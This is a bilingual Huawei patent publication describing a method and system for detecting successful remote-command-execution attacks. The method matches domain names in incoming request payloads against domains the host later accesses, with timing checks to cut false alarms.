WO2023216792A1

WO2023216792A1 - Attack detection method, and apparatus

Info

Publication number: WO2023216792A1
Application number: PCT/CN2023/087493
Authority: WO
Inventors: 杨浩鹏; 王飞跃; ***
Original assignee: 华为技术有限公司
Priority date: 2022-05-07
Filing date: 2023-04-11
Publication date: 2023-11-16
Also published as: CN117061139A

Abstract

In an attack detection method, a detection device acquires a web log of a host and a host log of the host, the network log of the host comprising parameter information of a first request message, the first request message being a request message received by the host from another device, the parameter information of the first request message comprising a first domain name included in a payload part of the first request message, and the host log of the host comprising at least one domain name accessed by the host; the detection device matches the first domain name with the at least one domain name; and, if the at least one domain name comprises the first domain name, the detection device generates alarm information used for indicating that the host is attacked. Hence, by combining the first domain name in the first request message and the at least one domain name accessed by the host, the present solution determines whether an attack on the host is successful, and generates alarm information only when the attack is successfully executed, thereby accurately detecting the attack on the host, and avoiding a large number of false alarms.

Description

一种检测攻击的方法及装置A method and device for detecting attacks

本申请要求于2022年5月7日提交中国国家知识产权局、申请号为202210493521.X、申请名称为“一种检测攻击的方法及装置”的中国专利申请的优先权，其全部内容通过引用结合在本申请中。This application claims priority to the Chinese patent application filed with the State Intellectual Property Office of China on May 7, 2022, with application number 202210493521.X and application title "A method and device for detecting attacks", the entire content of which is incorporated by reference. incorporated in this application.

技术领域Technical field

本申请涉及信息安全领域，尤其涉及一种检测攻击的方法及装置。The present application relates to the field of information security, and in particular to a method and device for detecting attacks.

背景技术Background technique

攻击者通常会使用漏洞对主机进行入侵，一些漏洞允许攻击者直接在主机上执行***命令，是危害程度较高、被攻击者利用较为广泛的漏洞。这样的漏洞例如包括远程命令执行(Remote Command Execution，RCE)漏洞。针对这种攻击行为，传统技术通过人工分析漏洞的特征，编写出对应的检测规则，并将检测规则配置在防火墙等安全设备。安全设备基于检测规则对流经的流量进行特征匹配，如果匹配中则生成告警，以指示发生了攻击事件。Attackers usually use vulnerabilities to invade hosts. Some vulnerabilities allow attackers to directly execute system commands on the host. They are highly harmful vulnerabilities and are widely exploited by attackers. Such vulnerabilities include, for example, Remote Command Execution (RCE) vulnerabilities. In response to this kind of attack behavior, traditional technology manually analyzes the characteristics of vulnerabilities, writes corresponding detection rules, and configures the detection rules on security devices such as firewalls. The security device matches the characteristics of the traffic flowing through based on the detection rules. If there is a match, an alarm is generated to indicate that an attack event has occurred.

上述传统技术往往存在准确率较低的现象，如何准确的检测出攻击者基于上述漏洞而发起的攻击，是目前尚待解决的问题。The above-mentioned traditional technologies often have low accuracy. How to accurately detect attacks launched by attackers based on the above-mentioned vulnerabilities is a problem that has yet to be solved.

发明内容Contents of the invention

本申请实施例提供了一种检测攻击的方法及装置，能够准确地检测出基于特定类别的漏洞所发起的攻击。The embodiments of this application provide a method and device for detecting attacks, which can accurately detect attacks based on specific types of vulnerabilities.

第一方面，本申请实施例提供了一种检测攻击的方法，该方法应用于检测设备。在一个示例中，所述检测设备获取主机的网络日志和主机的主机日志，其中，所述主机的网络日志包括第一请求报文的参数信息，所述第一请求报文是所述主机接收到的来自其它设备的请求报文，第一请求报文的参数信息，包括第一请求报文的载荷部分中包括的第一域名。所述主机的主机日志包括主机访问的至少一个域名。检测设备获取主机的网络日志和主机的主机日志之后，将所述网络日志中包括的第一域名和主机日志中的至少一个域名进行匹配。若主机日志中的至少一个域名包括网络日志中的第一域名，则说明：所述主机接收到了包括第一域名的第一请求报文，并且，所述主机访问了所述第一域名。对于这种情况，认为主机基于所述第一请求报文访问了所述第一请求报文中的第一域名。换句话说，这种情况表明主机存在攻击者通过第一请求报文所试图利用的漏洞(此类漏洞允许攻击者直接在主机上执行***命令)，并且攻击者针对该漏洞发动的攻击执行成功。在这种情况下，检测设备产生用于指示所述主机被攻击的告警信息。由此可见，本方案结合第一请求报文中包括的第一域名以及主机访问的至少一个域名来确定针对主机的攻击是否成功，并在攻击执行成功的情况下才生成告警信息。相应地，若主机日志中的至少一个域名中不包括网络日志中包括的第一域名，说明攻击者虽然试图利用的漏洞发起攻击，但该攻击并未执行成功，在这种情况下不生成告警。因此，本方案能够准确的对针对主机的攻击进行检测，避免生成大量误告警。In the first aspect, embodiments of the present application provide a method for detecting attacks, which method is applied to detection equipment. In one example, the detection device obtains the network log of the host and the host log of the host, wherein the network log of the host includes parameter information of the first request message, and the first request message is received by the host. When a request message is received from another device, the parameter information of the first request message includes the first domain name included in the payload part of the first request message. The host log of the host includes at least one domain name accessed by the host. After acquiring the network log of the host and the host log of the host, the detection device matches the first domain name included in the network log with at least one domain name in the host log. If at least one domain name in the host log includes the first domain name in the network log, it means that the host has received the first request message including the first domain name, and the host has accessed the first domain name. In this case, it is considered that the host accessed the first domain name in the first request message based on the first request message. In other words, this situation indicates that the host has a vulnerability that the attacker tried to exploit through the first request message (such a vulnerability allows the attacker to directly execute system commands on the host), and the attacker launched an attack targeting the vulnerability successfully. . In this case, the detection device generates alarm information indicating that the host is attacked. It can be seen that this solution combines the first domain name included in the first request message and at least one domain name accessed by the host to determine whether the attack on the host is successful, and only generates alarm information when the attack is successfully executed. Correspondingly, if at least one domain name in the host log does not include the first domain name included in the network log, it means that although the attacker tried to exploit the vulnerability to launch an attack, the attack did not succeed. In this case, no alarm is generated. . Therefore, this solution can accurately detect attacks against hosts and avoid generating a large number of false alarms.

在一种可能的实现方式中，第一请求报文的参数信息还包括主机接收到所述第一请求报文的时刻。主机的主机日志还包括所述至少一个域名中每个域名分别对应的时刻，其中，所述主机日志中的第二域名对应的时刻为所述主机访问所述第二域名的时刻，所述至少一个域名包括所述第二域名。对于这种情况，检测设备基于主机的网络日志能够确定更多与第一请求报文相关的信息，检测设备基于主机的主机日志，能够确定主机访问所述至少一个域名对应的时刻。In a possible implementation, the parameter information of the first request message also includes the time when the host receives the first request message. The host log of the host also includes the time corresponding to each domain name in the at least one domain name, wherein the time corresponding to the second domain name in the host log is the time when the host accesses the second domain name, and the at least one The domain names include the second domain name. For this situation, the detection device can determine more information related to the first request message based on the host's network log, and the detection device can determine the time when the host accesses the at least one domain name based on the host's host log.

在一种可能的实现方式中，为了提升检测攻击的准确性，在检测设备接收到的网络日志包括主机接收到第一请求报文的时刻、检测设备接收到的主机日志包括所述至少一个域名中每个域名分别对应的时刻的情况下，检测设备除了将第一域名与所述至少一个域名进行匹配之外，若所述至少一个域名中包括所述第一域名，所述检测设备进一步判断所述主机日志中包括的所述第一域名对应的时刻是否晚于所述主机接收到所述第一请求报文的时刻。若所述主机日志中包括的所述第一域名对应的时刻晚于所述主机接收到所述第一请求报文的时刻，则说明所述主机先接收到所述第一请求报文，再访问所述第一域名，此时，确认主机被攻击，具体地，确定攻击者利用第一请求报文对主机实施了攻击。对于这种情况，检测设备产生前述用于指示主机被攻击的告警信息。In a possible implementation, in order to improve the accuracy of detecting attacks, when the network log received by the detection device includes the moment when the host receives the first request message, the host log received by the detection device includes the at least one domain name. When each domain name in the domain name corresponds to a time, in addition to matching the first domain name with the at least one domain name, the detection device further determines if the at least one domain name includes the first domain name. Whether the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message. If the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message, it means that the host receives the first request message first, and then The first domain name is accessed. At this time, it is confirmed that the host is attacked. Specifically, it is determined that the attacker used the first request message to attack the host. In this case, the detection device generates the aforementioned alarm information indicating that the host is under attack.

在一种可能的实现方式中，考虑到对于攻击报文而言，主机接收到该攻击报文的时刻与主机访问该攻击报文中的域名的时刻之间具有一定的时间差，该时间差一般在一定的范围内。因此，在一个示例中，检测设备在确定所述至少一个域名中包括所述第一域名、且主机日志中包括的所述第一域名对应的时刻晚于主机接收到所述第一请求报文的时刻之后，还进一步判断主机日志中包括的所述第一域名对应的时刻与所述主机接收到所述第一请求报文的时刻之间的差值是否小于或者等于预设时间阈值。当所述主机日志中包括的所述第一域名对应的时刻与所述主机接收到所述第一请求报文的时刻之间的差值小于或者等于预设时间阈值时，确定主机被攻击，具体地，确定攻击者利用所述第一请求报文对主机实施了攻击。对于这种情况，检测设备产生前述用于指示主机被攻击的告警信息。In a possible implementation, it is considered that for an attack message, there is a certain time difference between the time when the host receives the attack message and the time when the host accesses the domain name in the attack message. The time difference is generally between Within a certain range. Therefore, in one example, the detection device determines that the at least one domain name includes the first domain name and the time corresponding to the first domain name included in the host log is later than when the host receives the first request message. After the time, it is further determined whether the difference between the time corresponding to the first domain name included in the host log and the time when the host receives the first request message is less than or equal to a preset time threshold. When the difference between the time corresponding to the first domain name included in the host log and the time when the host receives the first request message is less than or equal to the preset time threshold, it is determined that the host is attacked, Specifically, it is determined that the attacker used the first request message to attack the host. In this case, the detection device generates the aforementioned alarm information indicating that the host is under attack.

在一种可能的实现方式中，前述检测设备集成于主机中，对于这种情况，检测设备获取主机的网络日志，即为：主机获取自身的网络日志。在一个示例中，主机可以通过挂钩(hook)网络函数，获取所述主机的网络日志。相应的，检测设备获取主机的主机日志，即为：主机获取自身的主机日志。在一个示例中，主机通过hook操作***中的shell执行过程，获取自身的主机日志。In a possible implementation, the aforementioned detection device is integrated into the host. In this case, the detection device obtains the network log of the host, that is, the host obtains its own network log. In one example, the host can obtain the network log of the host by hooking a network function. Correspondingly, the detection device obtains the host log of the host, that is, the host obtains its own host log. In one example, the host obtains its own host logs by hooking the shell execution process in the operating system.

在一种可能的实现方式中，所述检测设备是与所述主机存在网络连接的另一独立计算机设备，对于这种情况，检测设备获取主机的网络日志的具体实现方式为：检测设备接收安全设备发送的所述网络日志，所述安全设备部署于所述其他设备与所述主机之间。相应的，检测设备获取所述主机的主机日志的具体实现方式为：检测设备接收所述主机发送的所述主机日志。In a possible implementation, the detection device is another independent computer device connected to the host through a network. In this case, the specific implementation method for the detection device to obtain the network log of the host is: the detection device receives a secure The network log sent by the device, the security device is deployed between the other device and the host. Correspondingly, the specific implementation method for the detection device to obtain the host log of the host is: the detection device receives the host log sent by the host.

在一种可能的实现方式中，当检测设备是与所述主机存在网络连接的另一独立计算机设备时，检测设备、所述安全设备以及所述主机位于同一局域网内。对于这种情况，所述主机和安全设备能够访问检测设备，而该局域网之外的其它设备不能访问检测设备。In a possible implementation, when the detection device is another independent computer device with a network connection to the host, the detection device, the security device and the host are located in the same local area network. In this case, the host and the security device can access the detection device, but other devices outside the local area network cannot access the detection device.

在一种可能的实现方式中，所述检测设备部署于互联网中。对于这种情况，主机和安全设备能够访问检测设备，其它设备也能够访问检测设备。In a possible implementation, the detection device is deployed on the Internet. In this case, the host and security devices can access the detection device, and other devices can also access the detection device.

在一种可能的实现方式中，检测设备生成告警信息之后，进一步输出告警信息，以便于运维人员或者其它设备(例如管理设备)确定所述主机被攻击，从而采取相应的处理措施。输出所述告警信息。In a possible implementation, after the detection device generates the alarm information, it further outputs the alarm information, so that operation and maintenance personnel or other devices (such as management devices) can determine that the host is attacked and take corresponding processing measures. Give. Output the alarm information.

在一种可能的实现方式中，为了使得所述运维人员或者管理设备获知更多与攻击报文的信息，所述告警信息中还包括与所述第一请求报文相关的更多信息。作为一个示例，若检测设备获取的主机的网络日志中包括的第一请求报文的参数信息还包括第一请求报文的载荷部分和/或第一请求报文的目的IP地址，对于这种情况，所述告警信息中也对应包括所述参数信息中所包括的所述载荷部分和/或所述第一请求报文的目的IP地址。在又一个示例中，检测设备获取的主机的主机日志还包括所述主机的IP地址和/或所述至少一个域名中每个域名分别对应的日志记录。对于这种情况，所述告警信息还包括所述主机日志中所包括的所述主机的IP地址和/或所述第一域名对应的日志记录。In a possible implementation manner, in order to enable the operation and maintenance personnel or management equipment to learn more information about the attack message, the alarm information also includes more information related to the first request message. As an example, if the parameter information of the first request message included in the network log of the host obtained by the detection device also includes the payload part of the first request message and/or the destination IP address of the first request message, for this kind of In this case, the alarm information also includes the payload part included in the parameter information and/or the destination IP address of the first request message. In yet another example, the host log of the host obtained by the detection device also includes the IP address of the host and/or log records corresponding to each domain name in the at least one domain name. For this case, the alarm information also includes the IP address of the host included in the host log and/or the log record corresponding to the first domain name.

在一种可能的实现方式中，所述第一请求报文为基于攻击报文是一个传输控制协议(transmission control protocol，TCP)请求报文。对于这种情况，利用本方案，能够准确的确定利用TCP请求报文对主机的攻击是否成功，并攻击执行成功的情况下才生成告警信息。In a possible implementation manner, the first request message is based on the attack message and is a transmission control protocol (transmission control protocol, TCP) request message. For this situation, this solution can be used to accurately determine whether the attack on the host using TCP request messages is successful, and only generate alarm information when the attack is successfully executed.

第二方面，本申请实施例提供了一种检测攻击的***，所述***包括：安全设备、主机和检测设备；所述安全设备，用于将所述主机的网络日志发送给所述检测设备，所述网络日志中包括第一请求报文的参数信息，所述第一请求报文是主机接收到的来自其它设备的报文，所述参数信息包括所述第一请求报文的载荷部分中包括的第一域名；所述主机，用于将所述主机的主机日志发送给所述检测设备，所述主机日志包括所述主机访问的至少一个域名；所述检测设备，用于接收所述安全设备发送的所述网络日志、以及接收所述主机发送的所述主机日志，并在所述至少一个域名包括所述第一域名的情况下，则产生告警信息，所述告警用于指示所述主机被攻击。本方案结合第一请求报文中包括的第一域名以及主机访问的至少一个域名来确定针对主机的攻击是否成功，并在攻击执行成功的情况下才生成告警信息。相应地，若主机日志中的至少一个域名中不包括网络日志中包括的第一域名，说明攻击者虽然试图利用的漏洞发起攻击，但该攻击并未执行成功，在这种情况下不生成告警。因此，本方案能够准确的对针对主机的攻击进行检测，避免生成大量误告警。In the second aspect, embodiments of the present application provide a system for detecting attacks. The system includes: a security device, a host, and a detection device; the security device is configured to send network logs of the host to the detection device. , the network log includes parameter information of the first request message, the first request message is a message received by the host from other devices, and the parameter information includes the payload part of the first request message The first domain name included in; the host is used to send the host log of the host to the detection device, the host log includes at least one domain name accessed by the host; the detection device is used to receive the The network log sent by the security device and the host log sent by the host are received, and if the at least one domain name includes the first domain name, alarm information is generated, and the alarm is used to indicate The host is under attack. This solution combines the first domain name included in the first request message and at least one domain name accessed by the host to determine whether the attack on the host is successful, and only generates alarm information when the attack is successfully executed. Correspondingly, if at least one domain name in the host log does not include the first domain name included in the network log, it means that although the attacker tried to exploit the vulnerability to launch an attack, the attack did not succeed. In this case, no alarm is generated. . Therefore, this solution can accurately detect attacks against hosts and avoid generating a large number of false alarms.

在一种可能的实现方式中，所述参数信息还包括所述主机接收到所述第一请求报文的时刻，所述主机日志还包括所述至少一个域名中每个域名分别对应的时刻，其中，所述主机日志中的第二域名对应的时刻，为所述主机访问所述第二域名的时刻，所述至少一个域名包括所述第二域名。In a possible implementation, the parameter information also includes the time when the host receives the first request message, and the host log also includes the time corresponding to each domain name in the at least one domain name, Wherein, the time corresponding to the second domain name in the host log is the time when the host accesses the second domain name, and the at least one domain name includes the second domain name.

在一种可能的实现方式中，所述检测设备用于：在所述至少一个域名包括所述第一域名、且所述主机日志中包括的所述第一域名对应的时刻晚于所述主机接收到所述第一请求报文的时刻的情况下，产生所述告警信息。In a possible implementation, the detection device is configured to: when the at least one domain name includes the first domain name and the time corresponding to the first domain name included in the host log is later than the host The alarm information is generated when the first request message is received.

在一种可能的实现方式中，所述检测设备用于：在所述至少一个域名包括所述第一域名、所述主机日志中包括的所述第一域名对应的时刻晚于所述主机接收到所述第一请求报文的时刻、且所述主机日志中包括的所述第一域名对应的时刻与所述主机接收到所述第一请求报文的时刻之间的差值小于或者等于预设时间阈值的情况下，产生所述告警信息。In a possible implementation, the detection device is configured to receive a message later than the host when the at least one domain name includes the first domain name and the time corresponding to the first domain name included in the host log. The difference between the time when the first request message is received and the time corresponding to the first domain name included in the host log and the time when the host receives the first request message is less than or equal to When the time threshold is preset, the alarm information is generated.

在一种可能的实现方式中，所述主机通过hook操作***中的shell执行过程，获取所述主机的主机日志。In a possible implementation, the host obtains the host log of the host by hooking a shell execution process in the operating system.

在一种可能的实现方式中，所述检测设备、所述安全设备以及所述主机位于同一局域网内。In a possible implementation, the detection device, the security device and the host are located in the same local area within the network.

在一种可能的实现方式中，所述检测设备部署于互联网中。In a possible implementation, the detection device is deployed on the Internet.

在一种可能的实现方式中，所述检测设备还用于：输出所述告警信息。In a possible implementation, the detection device is further configured to: output the alarm information.

在一种可能的实现方式中，所述参数信息还包括所述载荷部分和/或所述第一请求报文的目的因特网协议IP地址，所述告警信息包括所述参数信息中所包括的所述载荷部分和/或所述第一请求报文的目的IP地址。In a possible implementation, the parameter information also includes the payload part and/or the destination Internet protocol IP address of the first request message, and the alarm information includes all the parameters included in the parameter information. The payload part and/or the destination IP address of the first request message.

在一种可能的实现方式中，所述主机日志还包括所述主机的IP地址和/或所述至少一个域名中每个域名分别对应的日志记录，所述告警信息包括所述主机日志中所包括的所述主机的IP地址和/或所述第一域名对应的日志记录。In a possible implementation, the host log also includes the IP address of the host and/or log records corresponding to each domain name in the at least one domain name, and the alarm information includes all the information in the host log. Include the IP address of the host and/or the log records corresponding to the first domain name.

在一种可能的实现方式中，所述第一请求报文为基于TCP的请求报文。In a possible implementation manner, the first request message is a TCP-based request message.

第三方面，本申请实施例提供了一种检测装置，所述检测装置集成于主机中，所述检测装置包括：获取模块，用于获取所述主机的网络日志，所述网络日志中包括第一请求报文的参数信息，所述第一请求报文是主机接收到的来自其它设备的请求报文，所述参数信息包括所述第一请求报文的载荷部分中包括的第一域名；所述获取模块还用于，获取所述主机的主机日志，所述主机日志包括所述主机访问的至少一个域名；处理模块，用于若所述至少一个域名包括所述第一域名，则产生告警信息，所述告警信息用于指示所述主机被攻击。In a third aspect, embodiments of the present application provide a detection device. The detection device is integrated in a host. The detection device includes: an acquisition module for acquiring network logs of the host. The network logs include the third Parameter information of a request message, the first request message is a request message received by the host from other devices, and the parameter information includes the first domain name included in the payload part of the first request message; The acquisition module is also configured to acquire the host log of the host, where the host log includes at least one domain name accessed by the host; and the processing module is configured to generate if the at least one domain name includes the first domain name. Alarm information, the alarm information is used to indicate that the host is under attack.

在一种可能的实现方式中，所述获取模块，用于通过挂钩hook网络函数，获取所述主机的网络日志，以及通过hook操作***中的shell执行过程，获取所述主机的主机日志。In a possible implementation, the acquisition module is used to obtain the network log of the host by hooking a network function, and obtain the host log of the host by hooking a shell execution process in the operating system.

第四方面，本申请实施例提供了一种检测装置，应用于检测设备，所述装置包括：获取模块，用于获取主机的网络日志，所述网络日志中包括第一请求报文的参数信息，所述第一请求报文是所述主机接收到的来自其它设备的请求报文，所述参数信息包括所述第一请求报文的载荷部分中包括的第一域名；所述获取模块，还用于获取所述主机的主机日志，所述主机日志包括所述主机访问的至少一个域名；处理模块，用于若所述至少一个域名包括所述第一域名，则产生告警信息，所述告警用于指示所述主机被攻击。In the fourth aspect, embodiments of the present application provide a detection device, which is applied to detection equipment. The device includes: an acquisition module, used to acquire network logs of the host, where the network logs include parameter information of the first request message. , the first request message is a request message from other devices received by the host, and the parameter information includes the first domain name included in the payload part of the first request message; the acquisition module, It is also used to obtain the host log of the host, where the host log includes at least one domain name accessed by the host; a processing module configured to generate alarm information if the at least one domain name includes the first domain name, the The alarm is used to indicate that the host is under attack.

在一种可能的实现方式中，所述参数信息还包括所述主机接收到所述第一请求报文的时刻，所述主机日志还包括所述至少一个域名中每个域名分别对应的时刻，其中，所述主机日志中的第二域名对应的时刻为所述主机访问所述第二域名的时刻，所述至少一个域名包括所述第二域名。In a possible implementation, the parameter information also includes the time when the host receives the first request message, and the host log also includes the time corresponding to each domain name in the at least one domain name, Wherein, the time corresponding to the second domain name in the host log is the time when the host accesses the second domain name, and the at least one domain name includes the second domain name.

在一种可能的实现方式中，所述若所述至少一个域名包括所述第一域名，则所述处理模块，用于：若所述至少一个域名包括所述第一域名、且所述主机日志中包括的所述第一域名对应的时刻晚于所述主机接收到所述第一请求报文的时刻，则产生所述告警信息。In a possible implementation, if the at least one domain name includes the first domain name, the processing module is configured to: if the at least one domain name includes the first domain name, and the host If the time corresponding to the first domain name included in the log is later than the time when the host receives the first request message, the alarm information is generated.

在一种可能的实现方式中，所述若所述至少一个域名包括所述第一域名、且所述主机日志中包括的所述第一域名对应的时刻晚于所述主机接收到所述第一请求报文的时刻，则所述处理模块，用于：若所述至少一个域名包括所述第一域名、所述主机日志中包括的所述第一域名对应的时刻晚于所述主机接收到所述第一请求报文的时刻、且所述主机日志中包括的所述第一域名对应的时刻与所述主机接收到所述第一请求报文的时刻之间的差值小于或者等于预设时间阈值，则产生所述告警信息。 In a possible implementation, if the at least one domain name includes the first domain name, and the time corresponding to the first domain name included in the host log is later than when the host receives the third domain name, When a request message is received, the processing module is configured to: if the at least one domain name includes the first domain name, and the time corresponding to the first domain name included in the host log is later than the time the host receives the message. The difference between the time when the first request message is received and the time corresponding to the first domain name included in the host log and the time when the host receives the first request message is less than or equal to If the time threshold is preset, the alarm information is generated.

在一种可能的实现方式中，所述检测设备集成于所述主机中，所述获取模块，用于：通过挂钩hook网络函数，获取所述主机的网络日志；通过hook操作***中的shell执行过程，获取所述主机的主机日志。In a possible implementation, the detection device is integrated into the host, and the acquisition module is used to: obtain the network log of the host by hooking a network function; and execute by hooking a shell in the operating system Process to obtain the host log of the host.

在一种可能的实现方式中，所述检测设备是与所述主机存在网络连接的另一独立计算机设备，所述获取模块，用于：接收安全设备发送的所述网络日志，所述安全设备部署于所述其他设备与所述主机之间；接收所述主机发送的所述主机日志。In a possible implementation, the detection device is another independent computer device that has a network connection with the host, and the acquisition module is configured to: receive the network log sent by the security device, and the security device Deployed between the other devices and the host; receiving the host log sent by the host.

在一种可能的实现方式中，所述检测设备、所述安全设备以及所述主机位于同一局域网内。In a possible implementation, the detection device, the security device and the host are located in the same local area network.

在一种可能的实现方式中，所述处理模块还用于：输出所述告警信息。In a possible implementation, the processing module is further configured to: output the alarm information.

在一种可能的实现方式中，所述参数信息还包括所述载荷部分和/或所述第一请求报文的目的因特网协议IP地址，所述告警信息还包括所述参数信息中所包括的所述载荷部分和/或所述第一请求报文的目的IP地址。In a possible implementation, the parameter information also includes the payload part and/or the destination Internet protocol IP address of the first request message, and the alarm information also includes the parameter information included in the parameter information. The payload part and/or the destination IP address of the first request message.

在一种可能的实现方式中，所述主机日志还包括所述主机的IP地址和/或所述至少一个域名中每个域名分别对应的日志记录，所述告警信息还包括所述主机日志中所包括的所述主机的IP地址和/或所述第一域名对应的日志记录。In a possible implementation, the host log also includes the IP address of the host and/or log records corresponding to each domain name in the at least one domain name, and the alarm information also includes the host log. Included are log records corresponding to the IP address of the host and/or the first domain name.

第五方面，本申请实施例提供了一种设备。所述设备包括处理器和存储器。所述存储器用于存储指令或计算机程序。所述处理器用于执行所述存储器中的所述指令或计算机程序，执行以上第一方面任意一项所述的方法。In a fifth aspect, embodiments of the present application provide a device. The device includes a processor and memory. The memory is used to store instructions or computer programs. The processor is configured to execute the instructions or computer programs in the memory, and perform the method described in any one of the above first aspects.

第六方面，本申请实施例提供了一种计算机可读存储介质，包括指令或计算机程序，当其在计算机上运行时，使得计算机执行以上第一方面任意一项所述的方法。In a sixth aspect, embodiments of the present application provide a computer-readable storage medium, which includes instructions or computer programs that, when run on a computer, cause the computer to perform any of the methods described in the first aspect above.

第七方面，本申请实施例提供了一种包含指令或计算机程序的计算机程序产品，当其在计算机上运行时，使得计算机执行以上第一方面任意一项所述的方法。In a seventh aspect, embodiments of the present application provide a computer program product containing instructions or computer programs that, when run on a computer, cause the computer to perform any of the methods described in the first aspect above.

附图说明Description of the drawings

为了更清楚地说明本申请实施例或现有技术中的技术方案，下面将对实施例或现有技术描述中所需要使用的附图作简单地介绍，显而易见地，下面描述中的附图仅仅是本申请中记载的一些实施例，对于本领域普通技术人员来讲，在不付出创造性劳动的前提下，还可以根据这些附图获得其他的附图。In order to explain the embodiments of the present application or the technical solutions in the prior art more clearly, the drawings needed to be used in the description of the embodiments or the prior art will be briefly introduced below. Obviously, the drawings in the following description are only These are some embodiments recorded in this application. For those of ordinary skill in the art, other drawings can be obtained based on these drawings without exerting creative efforts.

图1为一种利用特定类别的漏洞发起攻击示例性应用场景的过程示意图；Figure 1 is a schematic diagram of the process of launching an attack using a specific category of vulnerabilities in an exemplary application scenario;

图2a为本申请实施例提供的一种示例性应用场景的示意图；Figure 2a is a schematic diagram of an exemplary application scenario provided by the embodiment of the present application;

图2b为本申请实施例提供的另一种示例性应用场景的示意图；Figure 2b is a schematic diagram of another exemplary application scenario provided by the embodiment of the present application;

图2c为本申请实施例提供的又一种示例性应用场景的示意图；Figure 2c is a schematic diagram of another exemplary application scenario provided by the embodiment of the present application;

图3为本申请实施例提供的一种检测攻击方法的流程示意图；Figure 3 is a schematic flowchart of an attack detection method provided by an embodiment of the present application;

图4为本申请实施例提供的一种检测攻击方法的信令交互图；Figure 4 is a signaling interaction diagram of an attack detection method provided by an embodiment of the present application;

图5为本申请实施例提供的一种检测装置的结构示意图；Figure 5 is a schematic structural diagram of a detection device provided by an embodiment of the present application;

图6为本申请实施例提供的一种设备的结构示意图。Figure 6 is a schematic structural diagram of a device provided by an embodiment of the present application.

具体实施方式Detailed ways

本申请实施例提供了一种检测攻击的方法及装置，能够提升针对利用特定类别的漏洞所发起的攻击的检测准确性。其中，所述特定类别的漏洞包括允许攻击者直接在主机上执行***命令的漏洞。The embodiments of this application provide a method and device for detecting attacks, which can improve the ability to exploit specific types of vulnerabilities. Detection accuracy of attacks launched. Among them, the specific category of vulnerabilities includes vulnerabilities that allow attackers to directly execute system commands on the host.

为方便理解，首先结合附图对上述利用特定类别的漏洞发起的攻击进行简单介绍。To facilitate understanding, first, a brief introduction to the above-mentioned attacks using specific categories of vulnerabilities will be given with reference to the attached figure.

参见图1，该图为一种利用特定类别的漏洞发起攻击的过程示意图。攻击者向主机发送含有攻击命令的攻击报文，在一个示例中，所述攻击命令为下载存储在域名A上的恶意软件到主机本地执行。可选地，攻击报文是一个TCP请求报文。See Figure 1, which is a schematic diagram of the process of launching an attack using a specific category of vulnerabilities. The attacker sends an attack message containing an attack command to the host. In one example, the attack command is to download malware stored on domain name A and execute it locally on the host. Optionally, the attack message is a TCP request message.

主机上存在漏洞的服务接收到该攻击报文之后，漏洞利用被触发，漏洞利用被触发之后，存在漏洞的服务调用主机的操作***中的函数执行攻击报文中的攻击命令。进一步地：操作***向域名A发送访问请求，并下载存储在域名A某个文件目录中的恶意软件到主机本地，并在主机上执行该恶意软件。After the vulnerable service on the host receives the attack message, the vulnerability exploit is triggered. After the vulnerability exploit is triggered, the vulnerable service calls a function in the host's operating system to execute the attack command in the attack message. Further: the operating system sends an access request to domain name A, downloads the malware stored in a file directory of domain name A to the local host, and executes the malware on the host.

针对图1所示的攻击行为，传统技术通过人工分析漏洞的特征，编写出对应的检测规则，并将检测规则配置在防火墙等安全设备。安全设备基于检测规则对流经的流量进行特征匹配，如果匹配中则生成告警，以指示发生了攻击事件。例如，在图1所示的场景中，安全设备部署于攻击者和主机之间，在攻击者向主机发送该攻击报文时，安全设备对该攻击报文进行特征匹配。可替换地，安全设备部署于主机和域名A对应的设备之间，当主机向域名A发送访问请求时，安全设备对该访问请求进行特征匹配。类似的，当主机从域名A某个文件目录中下载恶意软件时，安全设备对包括该恶意软件的流量进行特征匹配。In response to the attack behavior shown in Figure 1, traditional technology manually analyzes the characteristics of the vulnerability, writes the corresponding detection rules, and configures the detection rules on security devices such as firewalls. The security device matches the characteristics of the traffic flowing through based on the detection rules. If there is a match, an alarm is generated to indicate that an attack event has occurred. For example, in the scenario shown in Figure 1, the security device is deployed between the attacker and the host. When the attacker sends the attack packet to the host, the security device performs feature matching on the attack packet. Alternatively, the security device is deployed between the host and the device corresponding to domain name A. When the host sends an access request to domain name A, the security device performs feature matching on the access request. Similarly, when a host downloads malware from a file directory in domain name A, the security device performs feature matching on the traffic that includes the malware.

但是，一方面，由于前述检测规则是基于漏洞的特征而总结的，而漏洞的数量以及种类均较多，分析人员无法对所有的漏洞均一一进行分析，若攻击者利用分析人员尚未分析的漏洞发起攻击，则安全设备无法检测出攻击者发起的攻击。当前，从漏洞被发现到攻击者利用漏洞发起攻击的时间越来越短，例如，越来越多漏洞从被发现到被利用发起攻击，相隔的时间只有不到1天。这种漏洞也被称为“零日漏洞”，又叫零时差攻击，即被发现后立即被恶意利用的安全漏洞。这种攻击往往具有很大的突发性与破坏性。However, on the one hand, because the aforementioned detection rules are summarized based on the characteristics of vulnerabilities, and the number and types of vulnerabilities are large, analysts cannot analyze all vulnerabilities one by one. If an attacker uses a vulnerability that has not been analyzed by analysts, If a vulnerability launches an attack, the security device cannot detect the attack launched by the attacker. Currently, the time from when a vulnerability is discovered to when an attacker exploits it to launch an attack is getting shorter and shorter. For example, the time between the discovery of an increasing number of vulnerabilities and the time they are exploited to launch an attack is less than one day. This kind of vulnerability is also called a "zero-day vulnerability" or a zero-day attack, which is a security vulnerability that is maliciously exploited immediately after being discovered. Such attacks are often very sudden and destructive.

另一方面，在一些场景中，虽然主机接收到了攻击报文，但是主机并未执行攻击报文中的攻击命令，即：攻击者并未攻击成功。对于这种情况，部署于攻击者和主机之间的安全设备基于检测规则对流经的流量进行特征匹配后，由于检测到攻击报文而依然会生成告警，从而导致误告警。On the other hand, in some scenarios, although the host receives the attack message, the host does not execute the attack command in the attack message, that is, the attacker does not succeed in the attack. In this case, after the security device deployed between the attacker and the host performs feature matching on the flowing traffic based on detection rules, an alarm will still be generated due to the detection of attack packets, resulting in false alarms.

为了解决上述问题，本申请实施例提供了一种检测攻击的方法，能够更加准确地检测出攻击者基于上述特定类别的漏洞而对主机发起的攻击，而且，该方案还能够降低误告警。In order to solve the above problems, embodiments of the present application provide a method for detecting attacks, which can more accurately detect attacks launched by attackers against hosts based on the above-mentioned specific categories of vulnerabilities. Moreover, this solution can also reduce false alarms.

在介绍本申请实施例提供的检测攻击的方法及***之前，首先对本申请实施例所提供的检测攻击的方法的应用场景进行介绍。Before introducing the attack detection method and system provided by the embodiments of the present application, the application scenarios of the attack detection method provided by the embodiments of the present application are first introduced.

